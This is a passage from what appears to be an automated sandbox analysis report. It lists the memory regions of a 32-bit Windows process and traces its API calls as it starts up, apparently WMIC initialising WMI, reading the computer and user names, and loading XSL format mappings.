0x76f60000 end_va = 0x76f6bfff entry_point = 0x76f60000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1816 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 1817 start_va = 0x77760000 end_va = 0x777e1fff entry_point = 0x77760000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1818 start_va = 0xca0000 end_va = 0xca0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ca0000" filename = "" Region: id = 1819 start_va = 0x74a20000 end_va = 0x74a2cfff entry_point = 0x74a20000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 1820 start_va = 0x77930000 end_va = 0x7798bfff entry_point = 0x77930000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1821 start_va = 0x749b0000 end_va = 0x74a15fff entry_point = 0x749b0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 1822 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1823 start_va = 0x5370000 end_va = 0x56a6fff entry_point = 0x5370000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1824 start_va = 0x77ba0000 end_va = 0x77c31fff entry_point = 0x77ba0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1825 start_va = 0xf40000 end_va = 0x1028fff entry_point = 0xf40000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1826 start_va = 0xcb0000 end_va = 0xcb3fff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1827 start_va = 0x74820000 end_va = 0x749affff entry_point = 0x74820000 region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 1828 start_va = 0xf40000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1829 start_va = 0x10d0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1830 start_va = 0x10d0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1831 start_va = 0x12b0000 end_va = 0x12bffff entry_point = 0x0 region_type = private name = "private_0x00000000012b0000" filename = "" Region: id = 1832 start_va = 0x10d0000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1833 start_va = 0x11a0000 end_va = 0x11affff entry_point = 0x0 region_type = private name = "private_0x00000000011a0000" filename = "" Region: id = 1834 start_va = 0xde0000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 1835 start_va = 0x11b0000 end_va = 0x128efff entry_point = 0x11b0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1836 start_va = 0x56b0000 end_va = 0x5aaffff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 1837 start_va = 0xcc0000 end_va = 0xcc0fff entry_point = 0xcc0000 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 1838 start_va = 0xde0000 end_va = 0xdfffff entry_point = 0x0 region_type = private name = "private_0x0000000000de0000" filename = "" Region: id = 1839 start_va = 0xe30000 end_va = 0xe3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e30000" filename = "" Region: id = 1840 start_va = 0x746c0000 end_va = 0x7481ffff entry_point = 0x746c0000 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1841 start_va = 0x77990000 end_va = 0x77a0afff entry_point = 0x77990000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1842 start_va = 0x778a0000 end_va = 0x7792cfff entry_point = 0x778a0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1843 start_va = 0x75080000 end_va = 0x750c3fff entry_point = 0x75080000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1844 start_va = 0x76ca0000 end_va = 0x76decfff entry_point = 0x76ca0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1845 start_va = 0x74d70000 end_va = 0x74eaffff entry_point = 0x74d70000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1846 start_va = 0x743f0000 end_va = 0x746b0fff entry_point = 0x743f0000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\SysWOW64\\iertutil.dll" (normalized: "c:\\windows\\syswow64\\iertutil.dll") Region: id = 1847 start_va = 0xe00000 end_va = 0xe29fff entry_point = 0xe00000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1848 start_va = 0x5ab0000 end_va = 0x5c37fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005ab0000" filename = "" Region: id = 1849 start_va = 0x775e0000 end_va = 0x7760afff entry_point = 0x775e0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1850 start_va = 0x76f70000 end_va = 0x7708ffff entry_point = 0x76f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1851 start_va = 0xe00000 end_va = 0xe0ffff entry_point = 0xe00000 region_type = mapped_file name = "wmic.exe.mui" filename = "\\Windows\\SysWOW64\\wbem\\en-US\\WMIC.exe.mui" (normalized: "c:\\windows\\syswow64\\wbem\\en-us\\wmic.exe.mui") Region: id = 1852 start_va = 0x5c40000 end_va = 0x5dc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005c40000" filename = "" Region: id = 1853 start_va = 0x5dd0000 end_va = 0x71cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005dd0000" filename = "" Region: id = 1854 start_va = 0xe10000 end_va = 0xe10fff entry_point = 0x0 region_type = private name = "private_0x0000000000e10000" filename = "" Region: id = 1855 start_va = 0xe20000 end_va = 0xe20fff entry_point = 0x0 region_type = private name = "private_0x0000000000e20000" filename = "" Region: id = 1856 start_va = 0x741c0000 end_va = 0x743e3fff entry_point = 0x741c0000 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\SysWOW64\\wininet.dll" (normalized: "c:\\windows\\syswow64\\wininet.dll") Region: id = 1857 start_va = 0x77430000 end_va = 0x77519fff entry_point = 0x77430000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1858 start_va = 0x74bc0000 end_va = 0x74c34fff entry_point = 0x74bc0000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1859 start_va = 0x71d0000 end_va = 0x72fffff entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 1860 start_va = 0xf40000 end_va = 0xf40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1861 start_va = 0xff0000 end_va = 0xffffff entry_point = 0x0 region_type = private name = "private_0x0000000000ff0000" filename = "" Region: id = 1862 start_va = 0x1000000 end_va = 0x10b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001000000" filename = "" Region: id = 1863 start_va = 0xf40000 end_va = 0xf43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f40000" filename = "" Region: id = 1864 start_va = 0x74ba0000 end_va = 0x74bbcfff entry_point = 0x74ba0000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 1865 start_va = 0x71d0000 end_va = 0x72cffff entry_point = 0x0 region_type = private name = "private_0x00000000071d0000" filename = "" Region: id = 1866 start_va = 0x72f0000 end_va = 0x72fffff entry_point = 0x0 region_type = private name = "private_0x00000000072f0000" filename = "" Region: id = 1867 start_va = 0x74aa0000 end_va = 0x74ab2fff entry_point = 0x74aa0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 1868 start_va = 0x74a70000 end_va = 0x74a9efff entry_point = 0x74a70000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 1869 start_va = 0xf50000 end_va = 0xf8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1870 start_va = 0xf90000 end_va = 0xfcffff entry_point = 0x0 region_type = private name = "private_0x0000000000f90000" filename = "" Region: id = 1871 start_va = 0x10d0000 end_va = 0x110ffff entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1872 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 1873 start_va = 0x1150000 end_va = 0x118ffff entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 1874 start_va = 0x1190000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001190000" filename = "" Region: id = 1875 start_va = 0x12c0000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x00000000012c0000" filename = "" Region: id = 1876 start_va = 0x7f4f7000 end_va = 0x7f4f9fff entry_point = 0x0 region_type = private name = "private_0x000000007f4f7000" filename = "" Region: id = 1877 start_va = 0x7f4fa000 end_va = 0x7f4fcfff entry_point = 0x0 region_type = private name = "private_0x000000007f4fa000" filename = "" Region: id = 1878 start_va = 0x7f4fd000 end_va = 0x7f4fffff entry_point = 0x0 region_type = private name = "private_0x000000007f4fd000" filename = "" Region: id = 1879 start_va = 0x741a0000 end_va = 0x741b0fff entry_point = 0x741a0000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 1880 start_va = 0x740e0000 end_va = 0x7419bfff entry_point = 0x740e0000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 1881 start_va = 0xfd0000 end_va = 0xfe4fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000fd0000" filename = "" Region: id = 1882 start_va = 0x7300000 end_va = 0x7328fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007300000" filename = "" Thread: id = 147 os_tid = 0xc90 [0104.666] GetModuleHandleA (lpModuleName=0x0) returned 0x1300000 [0104.666] __set_app_type (_Type=0x1) [0104.666] __p__fmode () returned 0x77ac4d6c [0104.666] __p__commode () returned 0x77ac5b1c [0104.666] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x133aa90) returned 0x0 [0104.666] __wgetmainargs (in: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0, _DoWildCard=0, _StartInfo=0x13491bc | out: _Argc=0x13491a8, _Argv=0x13491ac, _Env=0x13491b0) returned 0 [0104.667] ??0CHString@@QAE@XZ () returned 0x13495ec [0104.667] ??0CHString@@QAE@XZ () returned 0x13498fc [0104.667] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0104.667] SetConsoleCtrlHandler (HandlerRoutine=0x1334980, Add=1) returned 1 [0104.667] _onexit (_Func=0x1340a20) returned 0x1340a20 [0104.667] _onexit (_Func=0x1340a30) returned 0x1340a30 [0104.667] _onexit (_Func=0x1340a50) returned 0x1340a50 [0104.667] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0104.667] ResolveDelayLoadedAPI () returned 0x770fcd50 [0104.667] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0104.669] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0104.675] CoCreateInstance (in: rclsid=0x1306a1c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a2c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1349510 | out: ppv=0x1349510*=0xe46d50) returned 0x0 [0104.685] GetCurrentProcess () returned 0xffffffff [0104.685] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xc2fbcc | out: TokenHandle=0xc2fbcc*=0x158) returned 1 [0104.685] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xc2fbc8 | out: TokenInformation=0x0, ReturnLength=0xc2fbc8) returned 0 [0104.685] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x10c3a08, TokenInformationLength=0x118, ReturnLength=0xc2fbc8 | out: TokenInformation=0x10c3a08, ReturnLength=0xc2fbc8) returned 1 [0104.685] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0x10c3a08*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0104.685] CloseHandle (hObject=0x158) returned 1 [0104.685] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.687] _vsnwprintf (in: _Buffer=0x10c3a98, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0xc2fb54 | out: _Buffer="ms_409") returned 6 [0104.688] GetComputerNameW (in: lpBuffer=0x10c3ae0, nSize=0xc2fbb8 | out: lpBuffer="LHNIWSJ", nSize=0xc2fbb8) returned 1 [0104.688] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.688] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.688] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0104.688] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0xc2fbcc | out: lpNameBuffer=0x0, nSize=0xc2fbcc) returned 0x0 [0104.688] GetLastError () returned 0xea [0104.688] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x10c3b20, nSize=0xc2fbcc | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0xc2fbcc) returned 0x1 [0104.689] lstrlenW (lpString="") returned 0 [0104.689] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.689] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0104.690] lstrlenW (lpString=".") returned 1 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0104.690] lstrlenW (lpString="LOCALHOST") returned 9 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.690] lstrlenW (lpString="LHNIWSJ") returned 7 [0104.691] ResolveDelayLoadedAPI () returned 0x77bb9840 [0104.693] SysStringLen (param_1="IDENTIFY") returned 0x8 [0104.693] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0104.693] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0104.693] SysStringLen (param_1="IDENTIFY") returned 0x8 [0104.693] SysStringLen (param_1="IMPERSONATE") returned 0xb [0104.693] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0104.693] SysStringLen (param_1="IMPERSONATE") returned 0xb [0104.693] SysStringLen (param_1="IDENTIFY") returned 0x8 [0104.693] SysStringLen (param_1="IDENTIFY") returned 0x8 [0104.693] SysStringLen (param_1="IMPERSONATE") returned 0xb [0104.693] SysStringLen (param_1="DELEGATE") returned 0x8 [0104.693] SysStringLen (param_1="IDENTIFY") returned 0x8 [0104.693] SysStringLen (param_1="DELEGATE") returned 0x8 [0104.693] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0104.693] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0104.693] SysStringLen (param_1="DELEGATE") returned 0x8 [0104.693] SysStringLen (param_1="NONE") returned 0x4 [0104.693] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.693] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.693] SysStringLen (param_1="NONE") returned 0x4 [0104.693] SysStringLen (param_1="CONNECT") returned 0x7 [0104.693] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.694] SysStringLen (param_1="CALL") returned 0x4 [0104.694] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.694] SysStringLen (param_1="CALL") returned 0x4 [0104.694] SysStringLen (param_1="CONNECT") returned 0x7 [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="NONE") returned 0x4 [0104.694] SysStringLen (param_1="NONE") returned 0x4 [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="NONE") returned 0x4 [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0104.694] SysStringLen (param_1="DEFAULT") returned 0x7 [0104.694] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0104.694] SysStringLen (param_1="PKT") returned 0x3 [0104.694] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0104.694] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0104.694] GetSystemDirectoryW (in: lpBuffer=0x10c29d8, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0104.694] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0104.694] SysStringLen (param_1="\\wbem\\") returned 0x6 [0104.695] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0104.695] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0104.695] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0104.695] GetCurrentThreadId () returned 0xc90 [0104.695] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0xc2f6dc | out: phkResult=0xc2f6dc*=0x164) returned 0x0 [0104.695] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0xc2f6e8, lpcbData=0xc2f6e4*=0x400 | out: lpType=0x0, lpData=0xc2f6e8*=0x30, lpcbData=0xc2f6e4*=0x4) returned 0x0 [0104.695] _wcsicmp (_String1="0", _String2="1") returned -1 [0104.695] _wcsicmp (_String1="0", _String2="2") returned -2 [0104.695] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0xc2f6e4*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0xc2f6e4*=0x42) returned 0x0 [0104.695] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x10c2be0, lpcbData=0xc2f6e4*=0x42 | out: lpType=0x0, lpData=0x10c2be0*=0x25, lpcbData=0xc2f6e4*=0x42) returned 0x0 [0104.695] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0104.695] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0104.695] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0xc2f6e8, lpcbData=0xc2f6e4*=0x400 | out: lpType=0x0, lpData=0xc2f6e8*=0x36, lpcbData=0xc2f6e4*=0xc) returned 0x0 [0104.695] _wtol (_String="65536") returned 65536 [0104.695] RegCloseKey (hKey=0x0) returned 0x6 [0104.695] CoCreateInstance (in: rclsid=0x1306a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1306a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0xc2fb7c | out: ppv=0xc2fb7c*=0xff45a8) returned 0x0 [0104.704] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0xff45a8, xmlSource=0xc2fafc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0xc2fb60 | out: isSuccessful=0xc2fb60*=0xffff) returned 0x0 [0104.749] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0xff45a8, DOMElement=0xc2fb74 | out: DOMElement=0xc2fb74) returned 0x0 [0104.750] SysStringLen (param_1="VALUE") returned 0x5 [0104.750] SysStringLen (param_1="TABLE") returned 0x5 [0104.750] SysStringLen (param_1="TABLE") returned 0x5 [0104.750] SysStringLen (param_1="VALUE") returned 0x5 [0104.750] SysStringLen (param_1="LIST") returned 0x4 [0104.750] SysStringLen (param_1="TABLE") returned 0x5 [0104.751] SysStringLen (param_1="RAWXML") returned 0x6 [0104.751] SysStringLen (param_1="TABLE") returned 0x5 [0104.751] SysStringLen (param_1="RAWXML") returned 0x6 [0104.751] SysStringLen (param_1="LIST") returned 0x4 [0104.751] SysStringLen (param_1="LIST") returned 0x4 [0104.751] SysStringLen (param_1="RAWXML") returned 0x6 [0104.751] SysStringLen (param_1="HTABLE") returned 0x6 [0104.751] SysStringLen (param_1="TABLE") returned 0x5 [0104.751] SysStringLen (param_1="HTABLE") returned 0x6 [0104.751] SysStringLen (param_1="LIST") returned 0x4 [0104.752] SysStringLen (param_1="HFORM") returned 0x5 [0104.752] SysStringLen (param_1="TABLE") returned 0x5 [0104.752] SysStringLen (param_1="HFORM") returned 0x5 [0104.752] SysStringLen (param_1="LIST") returned 0x4 [0104.752] SysStringLen (param_1="HFORM") returned 0x5 [0104.752] SysStringLen (param_1="HTABLE") returned 0x6 [0104.752] SysStringLen (param_1="XML") returned 0x3 [0104.752] SysStringLen (param_1="TABLE") returned 0x5 [0104.752] SysStringLen (param_1="XML") returned 0x3 [0104.752] SysStringLen (param_1="VALUE") returned 0x5 [0104.752] SysStringLen (param_1="VALUE") returned 0x5 [0104.752] SysStringLen (param_1="XML") returned 0x3 [0104.753] SysStringLen (param_1="MOF") returned 0x3 [0104.753] SysStringLen (param_1="TABLE") returned 0x5 [0104.753] SysStringLen (param_1="MOF") returned 0x3 [0104.753] SysStringLen (param_1="LIST") returned 0x4 [0104.753] SysStringLen (param_1="MOF") returned 0x3 [0104.753] SysStringLen (param_1="RAWXML") returned 0x6 [0104.753] SysStringLen (param_1="LIST") returned 0x4 [0104.753] SysStringLen (param_1="MOF") returned 0x3 [0104.754] SysStringLen (param_1="CSV") returned 0x3 [0104.754] SysStringLen (param_1="TABLE") returned 0x5 [0104.754] SysStringLen (param_1="CSV") returned 0x3 [0104.754] SysStringLen (param_1="LIST") returned 0x4 [0104.754] SysStringLen (param_1="CSV") returned 0x3 [0104.754] SysStringLen (param_1="HTABLE") returned 0x6 [0104.754] SysStringLen (param_1="CSV") returned 0x3 [0104.754] SysStringLen (param_1="HFORM") returned 0x5 [0104.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.754] SysStringLen (param_1="TABLE") returned 0x5 [0104.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.754] SysStringLen (param_1="VALUE") returned 0x5 [0104.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.754] SysStringLen (param_1="XML") returned 0x3 [0104.754] SysStringLen (param_1="XML") returned 0x3 [0104.754] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.755] SysStringLen (param_1="texttablewsys") returned 0xd [0104.755] SysStringLen (param_1="TABLE") returned 0x5 [0104.755] SysStringLen (param_1="texttablewsys") returned 0xd [0104.755] SysStringLen (param_1="XML") returned 0x3 [0104.755] SysStringLen (param_1="texttablewsys") returned 0xd [0104.755] SysStringLen 